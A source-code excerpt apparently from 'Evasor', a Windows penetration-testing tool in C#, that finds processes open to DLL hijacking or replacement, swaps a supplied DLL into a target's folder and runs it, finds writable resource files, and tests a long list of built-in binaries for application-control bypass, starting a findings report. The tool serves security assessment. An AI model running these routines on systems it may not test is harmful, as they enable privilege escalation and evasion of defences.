819 | Console.WriteLine("___________________________________________________________________________________________________________________________________________");
820 | Console.ForegroundColor = ConsoleColor.Gray;
821 | Console.WriteLine("Which DLL to Replace? (0-" + (i - 1).ToString() + ")");
822 | int dllIndex = int.Parse(Console.ReadLine());
823 | sub_Paths = List_Of_Replaceble_dlls[dllIndex].Split('^');
824 | System.IO.File.Move(sub_Paths[1], PATH_OF_Evasor + @"\BACKUP\temp.dll");
825 | System.IO.File.Copy(PATH_OF_Evasor + @"\DLLs\" + dll, sub_Paths[1]);
826 | Console.ForegroundColor = ConsoleColor.Yellow;
827 | Console.WriteLine("___________________________________________________________________________________________________________________________________________");
828 | Console.ForegroundColor = ConsoleColor.Gray;
829 | Console.WriteLine("Type any key to run " + sub_Paths[0] + "!!!");
830 | Console.ReadLine();
831 | Process processs = new Process();
832 | processs.StartInfo.FileName = sub_Paths[0];
833 | Console.BackgroundColor = ConsoleColor.DarkGreen;
834 | Console.ForegroundColor = ConsoleColor.White;
835 | Console.WriteLine("POC --> Replace " + PATH_OF_Evasor + @"\DLLs\" + dll + " with " + sub_Paths[1] + " and execute " + processs.StartInfo.FileName + processs.StartInfo.Arguments);
836 | proof_Of_Concepts.Add("POC --> Replace " + PATH_OF_Evasor + @"\DLLs\" + dll + " with " + sub_Paths[1] + " and execute " + processs.StartInfo.FileName + processs.StartInfo.Arguments);
837 | Console.BackgroundColor = ConsoleColor.Black;
838 | Console.ForegroundColor = ConsoleColor.Gray;
839 | Console.WriteLine("Take a screen shot? (y/n)");
840 | if (Console.ReadLine() == "y")
841 | {
842 | proof_Of_Concepts_Pictures.Add(take_screen_shot(Path.GetFileName(sub_Paths[0] + "_" + dllIndex.ToString() + "_dll-Replace.jpeg")));
843 | }
844 | processs.WaitForExit();
845 | File.Delete(sub_Paths[1]);
846 | System.IO.File.Move(PATH_OF_Evasor + @"\BACKUP\temp.dll", sub_Paths[1]);
847 | }
848 | }
849 | Console.ForegroundColor = ConsoleColor.Gray;
850 | Console.Write("To exit and return to main menu type ");
851 | Console.ForegroundColor = ConsoleColor.Green;
852 | Console.Write("break");
853 | Console.ForegroundColor = ConsoleColor.Gray;
854 | Console.WriteLine(" else press Enter....");
855 | if (proof_Of_Concepts_Pictures.Count != 0)
856 | {
857 | //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
858 | Report.Scan_for_Process_vulnerable_to_DLL_hijack_DLL_replacement(List_Of_Hijckable_dlls, List_Of_Replaceble_dlls, proof_Of_Concepts, proof_Of_Concepts_Pictures);
859 | //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
860 | }
861 | if (Console.ReadLine() == "break")
862 | {
863 | break;
864 | }
865 | }
866 | }
867 | private static void console_Resources_Hijack_Bypass_prints()
868 | {
869 | List_Of_hijackble_resources = new List();
870 | if (!File.Exists(PATH_OF_Evasor + @"\hijackble_respurces.txt"))
871 | {
872 | Scan_for_resource_hijacking();
873 | }
874 | else
875 | {
876 | System.IO.StreamReader file = new System.IO.StreamReader(@"hijackble_respurces.txt");
877 | string line;
878 | while ((line = file.ReadLine()) != null)
879 | {
880 | List_Of_hijackble_resources.Add(line);
881 | }
882 | }
883 |
884 | foreach (string hijackableResource in List_Of_hijackble_resources)
885 | {
886 | try
887 | {
888 | string can_hijack = string.Empty;
889 | string subStr = System.IO.File.ReadAllText(hijackableResource);
890 | string[] listStrLineElements = Regex.Split(subStr, "\n");
891 | List paths = new List();
892 | foreach (string resource in listStrLineElements)
893 | {
894 | foreach (string file in file_ends_and_starts)
895 | {
896 | if (resource.Contains("This program cannot be run in DOS mode"))
897 | {
898 | can_hijack += ".program ";
899 | paths.Add("This program cannot be run in DOS mode ");
900 | }
901 | else
902 | {
903 | string resourceLower = resource.ToLower();
904 | if (resourceLower.Contains(file))
905 | {
906 | can_hijack += file + " ";
907 | paths.Add(resource + " ");
908 | }
909 | }
910 | }
911 | }
912 | if (can_hijack != string.Empty)
913 | {
914 | try
915 | {
916 | Console.ForegroundColor = ConsoleColor.Yellow;
917 | Console.WriteLine("________________________________________________________________________________________________________________________________________________________________________________________");
918 | Console.ForegroundColor = ConsoleColor.Gray;
919 | List listOfProcess = FileUtil.WhoIsLocking(hijackableResource);
920 | Console.ForegroundColor = ConsoleColor.Green;
921 | foreach (Process process in listOfProcess)
922 | {
923 | try
924 | {
925 | string owner = GetProcessExtraInformation(process.Id);
926 | Console.WriteLine("_Process:{0} PID:{1} Owner:{2}", process.ProcessName, process.Id, owner);
927 | Console.WriteLine(@"\");
928 | }
929 | catch (Exception ex) { }
930 | }
931 | Console.ForegroundColor = ConsoleColor.Gray;
932 | }
933 | catch (Exception ex)
934 | { }
935 | Console.Write(" " + hijackableResource + " ");
936 | Console.ForegroundColor = ConsoleColor.Green;
937 | string new_can_hijack_string = string.Join(" ", can_hijack.Split(' ').Distinct());
938 | var charsToRemove = new string[] { "<", ",", "\"", ">", "\n", "'", ")" };
939 | foreach (var c in charsToRemove)
940 | {
941 | new_can_hijack_string = new_can_hijack_string.Replace(c, string.Empty);
942 | }
943 | new_can_hijack_string = string.Join(" ", new_can_hijack_string.Split(' ').Distinct());
944 | Console.Write(new_can_hijack_string);
945 | Console.ForegroundColor = ConsoleColor.Gray;
946 | Console.WriteLine(" file path's can be hijacked !!!");
947 | Console.ForegroundColor = ConsoleColor.Cyan;
948 | foreach (string resourcePath in paths)
949 | {
950 | if (!hijackableResource.Contains(".exe") && !hijackableResource.Contains(".dll") && !hijackableResource.Contains(".msi") && !hijackableResource.Contains(".lib") && !hijackableResource.Contains(".EXE")
951 | && !hijackableResource.Contains(".DLL") && !hijackableResource.Contains(".MSI") && !hijackableResource.Contains(".LIB") || (hijackableResource.Contains(".log") || hijackableResource.Contains(".LOG")))
952 | {
953 | Console.Write(@" \____");
954 | Console.WriteLine(resourcePath);
955 | }
956 | }
957 |
958 | Console.ForegroundColor = ConsoleColor.Gray;
959 | }
960 | }
961 | catch (Exception ex) { }
962 | }
963 | }
964 |
965 | public static string OpenInerProcess(string filename, string command)
966 | {
967 | try
968 | {
969 | Process process = new Process();
970 | process.StartInfo.FileName = filename;
971 | process.StartInfo.Arguments = command;
972 | process.StartInfo.UseShellExecute = false;
973 | process.StartInfo.RedirectStandardOutput = false;
974 | process.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
975 | process.Start();
976 | string output = process.StandardOutput.ReadToEnd();
977 | Thread.Sleep(5);
978 | return output;
979 | }
980 | catch (Exception ex)
981 | {
982 | return string.Empty;
983 | }
984 | }
985 |
986 | private static void CreateFile(string filename, string content)
987 | {
988 | if (!File.Exists(filename))
989 | {
990 | using (var txtFile = File.AppendText(filename))
991 | {
992 | txtFile.WriteLine(content);
993 | }
994 | }
995 | }
996 |
997 | private static void Scan_Process_Vulnerable_To_Dll_Hijack(string dll)
998 | {
999 | Console.ForegroundColor = ConsoleColor.Cyan;
1000 | Console.WriteLine("_______________________________________________");
1001 | Console.WriteLine("|Scanning for Process vulnerable to DLL Hijack!|");
1002 | Console.WriteLine("|______________________________________________|");
1003 | Console.ForegroundColor = ConsoleColor.Gray;
1004 | try
1005 | {
1006 | Process[] processlist = Process.GetProcesses();
1007 |
1008 | Native n = new Native();
1009 |
1010 | foreach (Process theprocess in processlist)
1011 | {
1012 | if (theprocess.ProcessName != Process.GetCurrentProcess().ProcessName && theprocess.ProcessName != Process.GetCurrentProcess().ProcessName+".vshost")
1013 | {
1014 | try
1015 | {
1016 | string ExePath = Path.GetDirectoryName(ProcessExecutablePath(theprocess));
1017 | List files = new List();
1018 |
1019 | foreach (Module m in n.CollectModules(theprocess))
1020 | {
1021 | if (!File.Exists(ExePath + @"\" + m.ModuleName))
1022 | {
1023 | try
1024 | {
1025 | if (m.ModuleName.Contains(".exe") || m.ModuleName.Contains(".EXE"))
1026 | {
1027 | Console.WriteLine("________________________________________________________________________________________________________________________________________________________________________________________");
1028 | Console.WriteLine("|Process:{0} PID:{1} Owner:{2} Path:{3}", theprocess.ProcessName, theprocess.Id, GetProcessExtraInformation(theprocess.Id), ProcessExecutablePath(theprocess));
1029 | Console.WriteLine("|_______________________________________________________________________________________________________________________________________________________________________________________|");
1030 | }
1031 | else
1032 | {
1033 | CreateFile(Process.GetCurrentProcess().ProcessName + ".txt", "Evasor");
1034 | System.IO.File.Move(Path.GetFullPath(Process.GetCurrentProcess().ProcessName +".txt"), ExePath + @"\" + m.ModuleName);
1035 | System.IO.File.Delete(ExePath + @"\" + m.ModuleName);
1036 | Console.Write(m.ModuleName);
1037 | Console.ForegroundColor = ConsoleColor.Green;
1038 | Console.WriteLine(" Hijackable !!! ");
1039 | Console.ForegroundColor = ConsoleColor.Gray;
1040 | List_Of_Hijckable_dlls.Add(ProcessExecutablePath(theprocess) + "^" + ExePath + @"\" + m.ModuleName);
1041 | }
1042 | }
1043 | catch (Exception ex)
1044 | {
1045 | if (m.ModuleName.Contains(".exe") || m.ModuleName.Contains(".EXE"))
1046 | {
1047 | Console.WriteLine("________________________________________________________________________________________________________________________________________________________________________________________");
1048 | Console.WriteLine("|Process:{0} PID:{1} Owner:{2} Path:{3}", theprocess.ProcessName, theprocess.Id, GetProcessExtraInformation(theprocess.Id), ProcessExecutablePath(theprocess));
1049 | Console.WriteLine("|_______________________________________________________________________________________________________________________________________________________________________________________|");
1050 | }
1051 | else
1052 | {
1053 | Console.ForegroundColor = ConsoleColor.Red;
1054 | Console.WriteLine(m.ModuleName);
1055 | Console.ForegroundColor = ConsoleColor.Gray;
1056 | }
1057 | }
1058 | }
1059 | else
1060 | {
1061 | try
1062 | {
1063 | if (m.ModuleName.Contains(".exe") || m.ModuleName.Contains(".EXE"))
1064 | {
1065 | Console.WriteLine("________________________________________________________________________________________________________________________________________________________________________________________");
1066 | Console.WriteLine("|Process:{0} PID:{1} Owner:{2} Path:{3}", theprocess.ProcessName, theprocess.Id, GetProcessExtraInformation(theprocess.Id), ProcessExecutablePath(theprocess));
1067 | Console.WriteLine("|_______________________________________________________________________________________________________________________________________________________________________________________|");
1068 | }
1069 | else
1070 | {
1071 | System.IO.File.Move(ExePath + @"\" + m.ModuleName, ExePath + @"\" + "HIJACK" + m.ModuleName);
1072 | System.IO.File.Move(ExePath + @"\" + "HIJACK" + m.ModuleName, ExePath + @"\" + m.ModuleName);
1073 | Console.Write(m.ModuleName);
1074 | Console.ForegroundColor = ConsoleColor.Cyan;
1075 | Console.WriteLine(" Replacable !!!");
1076 | Console.ForegroundColor = ConsoleColor.Gray;
1077 | List_Of_Replaceble_dlls.Add(ProcessExecutablePath(theprocess) + "^" + ExePath + @"\" + m.ModuleName);
1078 | }
1079 | }
1080 | catch (Exception ex)
1081 | {
1082 | if (m.ModuleName.Contains(".exe") || m.ModuleName.Contains(".EXE"))
1083 | {
1084 | Console.WriteLine("________________________________________________________________________________________________________________________________________________________________________________________");
1085 | Console.WriteLine("|Process:{0} PID:{1} Owner:{2} Path:{3}", theprocess.ProcessName, theprocess.Id, GetProcessExtraInformation(theprocess.Id), ProcessExecutablePath(theprocess));
1086 | Console.WriteLine("|_______________________________________________________________________________________________________________________________________________________________________________________|");
1087 | }
1088 | else
1089 | {
1090 | Console.ForegroundColor = ConsoleColor.Red;
1091 | Console.WriteLine(m.ModuleName);
1092 | Console.ForegroundColor = ConsoleColor.Gray;
1093 | }
1094 | }
1095 | }
1096 |
1097 | }
1098 | }
1099 | catch (Exception ex)
1100 | { }
1101 | }
1102 | }
1103 | }
1104 | catch (Exception ex)
1105 | { }
1106 | }
1107 | private static void WalkDirectoryTree(System.IO.DirectoryInfo root)
1108 | {
1109 | System.IO.FileInfo[] files = null;
1110 | System.IO.DirectoryInfo[] subDirs = null;
1111 |
1112 | // First, process all the files directly under this folder
1113 | try
1114 | {
1115 | files = root.GetFiles("*.*");
1116 | }
1117 | // This is thrown if even one of the files requires permissions greater
1118 | // than the application provides.
1119 | catch (UnauthorizedAccessException e)
1120 | {
1121 | // This code just writes out the message and continues to recurse.
1122 | // You may decide to do something different here. For example, you
1123 | // can try to elevate your privileges and access the file again.
1124 | log.Add(e.Message);
1125 | }
1126 |
1127 | catch (System.IO.DirectoryNotFoundException e)
1128 | {
1129 | Console.WriteLine(e.Message);
1130 | }
1131 |
1132 | if (files != null)
1133 | {
1134 | foreach (System.IO.FileInfo fi in files)
1135 | {
1136 | // In this example, we only access the existing FileInfo object. If we
1137 | // want to open, delete or modify the file, then
1138 | // a try-catch block is required here to handle the case
1139 | // where the file has been deleted since the call to TraverseTree().
1140 | try
1141 | {
1142 | if (!fi.FullName.Contains(Process.GetCurrentProcess().ProcessName))
1143 | {
1144 | string filePath = System.IO.File.ReadAllText(fi.FullName);
1145 |
1146 |
1147 | if (isContains(filePath))
1148 | {
1149 | try
1150 | {
1151 | string can_hijack = string.Empty;
1152 | System.IO.File.Move(fi.FullName, Path.GetDirectoryName(fi.FullName) + @"\" + @"HIJACK" + Path.GetFileName(fi.FullName));
1153 | System.IO.File.Move(Path.GetDirectoryName(fi.FullName) + @"\" + @"HIJACK" + Path.GetFileName(fi.FullName), fi.FullName);
1154 | can_hijack = "Writable ";
1155 | if (can_hijack != string.Empty)
1156 | {
1157 | Console.Write(fi.FullName + " ");
1158 | using (System.IO.StreamWriter file = new System.IO.StreamWriter(@"hijackble_respurces.txt", true))
1159 | {
1160 | file.WriteLine(fi.FullName);
1161 | }
1162 | Console.ForegroundColor = ConsoleColor.Green;
1163 | Console.Write(can_hijack);
1164 | Console.ForegroundColor = ConsoleColor.Gray;
1165 | Console.WriteLine("file path's can be hijacked !!!");
1166 | List_Of_hijackble_resources.Add((fi.FullName));
1167 | }
1168 | }
1169 | catch (Exception ex)
1170 | { }
1171 | }
1172 | }
1173 | }
1174 | catch (Exception ex)
1175 | { }
1176 | }
1177 |
1178 | // Now find all the subdirectories under this directory.
1179 | subDirs = root.GetDirectories();
1180 |
1181 | foreach (System.IO.DirectoryInfo dirInfo in subDirs)
1182 | {
1183 | // Resursive call for each subdirectory.
1184 | WalkDirectoryTree(dirInfo);
1185 | }
1186 | }
1187 | }
1188 | private static bool isContains(string i_Path)
1189 | {
1190 | foreach (string file_extention in file_extentions)
1191 | {
1192 | if (i_Path.Contains(file_extention) == true)
1193 | {
1194 | return true;
1195 | }
1196 | }
1197 | return false;
1198 | }
1199 | private static void printPremissiomns(Process i_process)
1200 | {
1201 | FileSecurity security = File.GetAccessControl(ProcessExecutablePath(i_process));
1202 | AuthorizationRuleCollection acl = security.GetAccessRules(
1203 | true, true, typeof(System.Security.Principal.NTAccount));
1204 | foreach (FileSystemAccessRule ace in acl)
1205 | {
1206 | StringBuilder info = new StringBuilder();
1207 | string line = string.Format("Account: {0}",
1208 | ace.IdentityReference.Value);
1209 | info.AppendLine(line);
1210 | Console.WriteLine(@"\___" + line);
1211 | line = string.Format("Type: {0}", ace.AccessControlType);
1212 | info.AppendLine(line);
1213 | Console.WriteLine(@" \___" + line);
1214 | line = string.Format("Rights: {0}", ace.FileSystemRights);
1215 | info.AppendLine(line);
1216 | Console.WriteLine(@" \___" + line);
1217 | line = string.Format("Inherited ACE: {0}", ace.IsInherited);
1218 | info.AppendLine(line);
1219 | Console.WriteLine(@" \___" + line);
1220 | Console.WriteLine();
1221 | }
1222 | }
1223 | private static string ProcessExecutablePath(Process process)
1224 | {
1225 | try
1226 | {
1227 | return process.MainModule.FileName;
1228 | }
1229 | catch
1230 | {
1231 | string query = "SELECT ExecutablePath, ProcessID FROM Win32_Process";
1232 | ManagementObjectSearcher searcher = new ManagementObjectSearcher(query);
1233 |
1234 | foreach (ManagementObject item in searcher.Get())
1235 | {
1236 | object id = item["ProcessID"];
1237 | object path = item["ExecutablePath"];
1238 |
1239 | if (path != null && id.ToString() == process.Id.ToString())
1240 | {
1241 | return path.ToString();
1242 | }
1243 | }
1244 | }
1245 |
1246 | return "";
1247 | }
1248 | private static string Base64Encode(string plainText)
1249 | {
1250 | var plainTextBytes = System.Text.Encoding.UTF8.GetBytes(plainText);
1251 | return System.Convert.ToBase64String(plainTextBytes);
1252 | }
1253 | private static string Base64Decode(string base64EncodedData)
1254 | {
1255 | var base64EncodedBytes = System.Convert.FromBase64String(base64EncodedData);
1256 | return System.Text.Encoding.UTF8.GetString(base64EncodedBytes);
1257 | }
1258 | private static int OpenProcessScan(string FileName, string Args)
1259 | {
1260 | try
1261 | {
1262 | Process process = new Process();
1263 | process.StartInfo.FileName = FileName;
1264 | process.StartInfo.Arguments = Args;
1265 | process.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
1266 | process.Start();
1267 | process.Kill();
1268 | return process.ExitCode;
1269 | }
1270 | catch (Exception ex)
1271 | {
1272 | return 9;
1273 | }
1274 | }
1275 | private static void search_for_executables_that_can_bypass_appControl()
1276 | {
1277 | Console.ForegroundColor = ConsoleColor.Cyan;
1278 | Console.WriteLine("______________________________________________________________________");
1279 | Console.WriteLine("|Scanning for executibles which can bypass AppControl rules");
1280 | Console.WriteLine("|_____________________________________________________________________|");
1281 | Console.ForegroundColor = ConsoleColor.Gray;
1282 |
1283 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\regedit.exe");
1284 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\System32\at.exe");
1285 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\SysWOW64\at.exe");
1286 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\System32\reg.exe");
1287 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\SysWOW64\reg.exe");
1288 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\System32\cmd.exe");
1289 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\SysWOW64\cmd.exe");
1290 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\System32\winrm.cmd");
1291 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\SysWOW64\winrm.cmd");
1292 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\System32\cmstp.exe");
1293 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\SysWOW64\cmstp.exe");
1294 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\System32\Mshta.exe");
1295 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\SysWOW64\Mshta.exe");
1296 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\System32\control.exe");
1297 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\SysWOW64\control.exe");
1298 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\System32\Cscript.exe");
1299 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\SysWOW64\Cscript.exe");
1300 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\System32\Wscript.exe");
1301 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\SysWOW64\Wscript.exe");
1302 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\System32\msiexec.exe");
1303 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\SysWOW64\msiexec.exe");
1304 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\System32\regedit.exe");
1305 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\SysWOW64\regedit.exe");
1306 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\System32\regedt32.exe");
1307 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\SysWOW64\regedt32.exe");
1308 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\System32\Odbcconf.exe");
1309 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\SysWOW64\Odbcconf.exe");
1310 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\System32\SchTasks.exe");
1311 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\SysWOW64\SchTasks.exe");
1312 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\System32\forfiles.exe");
1313 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\SysWOW64\forfiles.exe");
1314 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\System32\regsvr32.exe");
1315 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\SysWOW64\regsvr32.exe");
1316 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\System32\rundll32.exe");
1317 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\SysWOW64\rundll32.exe");
1318 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\System32\ATBroker.exe");
1319 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\SysWOW64\ATBroker.exe");
1320 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\System32\wbem\wmic.exe");
1321 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\SysWOW64\wbem\wmic.exe");
1322 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\System32\Mavinject.exe");
1323 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\SysWOW64\Mavinject.exe");
1324 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Program Files\dotnet\dotnet.exe");
1325 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\System32\InfDefaultInstall.exe");
1326 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\SysWOW64\InfDefaultInstall.exe");
1327 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe");
1328 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe");
1329 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe");
1330 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe");
1331 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Regasm.exe");
1332 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Regasm.exe");
1333 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Regsvc.exe");
1334 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Regsvc.exe");
1335 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\msbuild.exe");
1336 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe");
1337 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\System32\Printing_Admin_Scripts\en-US\Pubprn.vbs");
1338 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\SysWOW64\Printing_Admin_Scripts\en-US\Pubprn.vbs");
1339 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\System32\WindowsPowerShell\v1.0\Powershell_ise.exe");
1340 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell_ise.exe");
1341 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe");
1342 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe");
1343 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Program Files (x86)\Microsoft SDKs\F#\4.0\Framework\v4.0\fsi.exe");
1344 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.6.1 Tools\Tracker.exe");
1345 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Program Files (x86)\Microsoft Visual Studio\2017\Enterprise\MSBuild\15.0\Bin\Tracker.exe");
1346 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.6.1 Tools\x64\Tracker.exe");
1347 | list_of_potential_executables_that_can_bypass_appControl.Add(@"c:\Program Files (x86)\Microsoft Visual Studio\2017\Community\MSBuild\15.0\Bin\Roslyn\csi.exe");
1348 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Program Files (x86)\Microsoft Visual Studio\2017\Enterprise\MSBuild\15.0\Bin\Roslyn\csi.exe");
1349 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Program Files (x86)\Microsoft Visual Studio\2017\Enterprise\MSBuild\15.0\Bin\amd64\Tracker.exe");
1350 |
1351 |
1352 | foreach (string executible in list_of_potential_executables_that_can_bypass_appControl)
1353 | {
1354 | int exitcode = OpenProcessScan(executible, string.Empty);
1355 | if (exitcode == -1)
1356 | {
1357 | Console.Write(executible);
1358 | list_of_available_executables_to_bypass_appControl.Add(executible);
1359 | Console.ForegroundColor = ConsoleColor.Green;
1360 | Console.Write(" can bypass");
1361 | Console.ForegroundColor = ConsoleColor.Gray;
1362 | Console.WriteLine(" APP CONTROL ");
1363 | }
1364 | else
1365 | {
1366 | Console.Write(executible);
1367 | Console.ForegroundColor = ConsoleColor.Red;
1368 | Console.Write(" can't bypass");
1369 | Console.ForegroundColor = ConsoleColor.Gray;
1370 | Console.WriteLine(" APP CONTROL ");
1371 | }
1372 | }
1373 | }
1374 | }
1375 | }
1376 |
--------------------------------------------------------------------------------
/Evasor/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("Evasor")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("Evasor")]
13 | [assembly: AssemblyCopyright("Copyright © 2020")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("1c8849ef-ad09-4727-bf81-1f777bd1aef8")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/Evasor/Refrence_DLLs_to_be_added to the project/Microsoft.Office.Interop.Word.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cyberark/Evasor/8628bcd143a1955a4d8c721850e7b85e2462ebe9/Evasor/Refrence_DLLs_to_be_added to the project/Microsoft.Office.Interop.Word.dll
--------------------------------------------------------------------------------
/Evasor/Refrence_DLLs_to_be_added to the project/Newtonsoft.Json.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cyberark/Evasor/8628bcd143a1955a4d8c721850e7b85e2462ebe9/Evasor/Refrence_DLLs_to_be_added to the project/Newtonsoft.Json.dll
--------------------------------------------------------------------------------
/Evasor/Refrence_DLLs_to_be_added to the project/System.Data.SQLite.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cyberark/Evasor/8628bcd143a1955a4d8c721850e7b85e2462ebe9/Evasor/Refrence_DLLs_to_be_added to the project/System.Data.SQLite.dll
--------------------------------------------------------------------------------
/Evasor/Refrence_DLLs_to_be_added to the project/System.Management.Automation.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cyberark/Evasor/8628bcd143a1955a4d8c721850e7b85e2462ebe9/Evasor/Refrence_DLLs_to_be_added to the project/System.Management.Automation.dll
--------------------------------------------------------------------------------
/Evasor/Report.cs:
--------------------------------------------------------------------------------
1 | using Microsoft.Office.Interop.Word;
2 | using System;
3 | using System.Collections.Generic;
4 | using System.Diagnostics;
5 | using System.IO;
6 | using System.Linq;
7 | using System.Text;
8 | using System.Threading.Tasks;
9 |
10 | namespace Evasor
11 | {
12 | public static class Report
13 | {
14 | static string Technical_Details = string.Empty;
15 | static string Issues = string.Empty;
16 | static string Recommendations_for_mitigation = string.Empty;
17 | static string Refrences = string.Empty;
18 | static string Proof_of_Concept = string.Empty;
19 | static string apps = string.Empty;
20 | static string apps_h = string.Empty;
21 | static string apps_r = string.Empty;
22 | static string pocs_and_pic = string.Empty;
23 |
24 | public static void Scan_Vulnerable_Process_To_DLL_Injection(List i_Results, List i_Pocs, List i_Pics)
25 | {
26 | Technical_Details = @"DLL injection is a technique which allows an attacker to run arbitrary code in the context of the address space of another process. If this process is running with excessive privileges then it could be abused by an attacker in order to execute malicious code in the form of a DLL file in order to elevate privileges or migrating to the target process in order to persist the open session to the target or to abuse the process ability to access is folder resources. Specifically, this technique follows the steps below:
27 | • A DLL needs to be dropped into the disk
28 | • The “CreateRemoteThread” calls the “LoadLibrary”
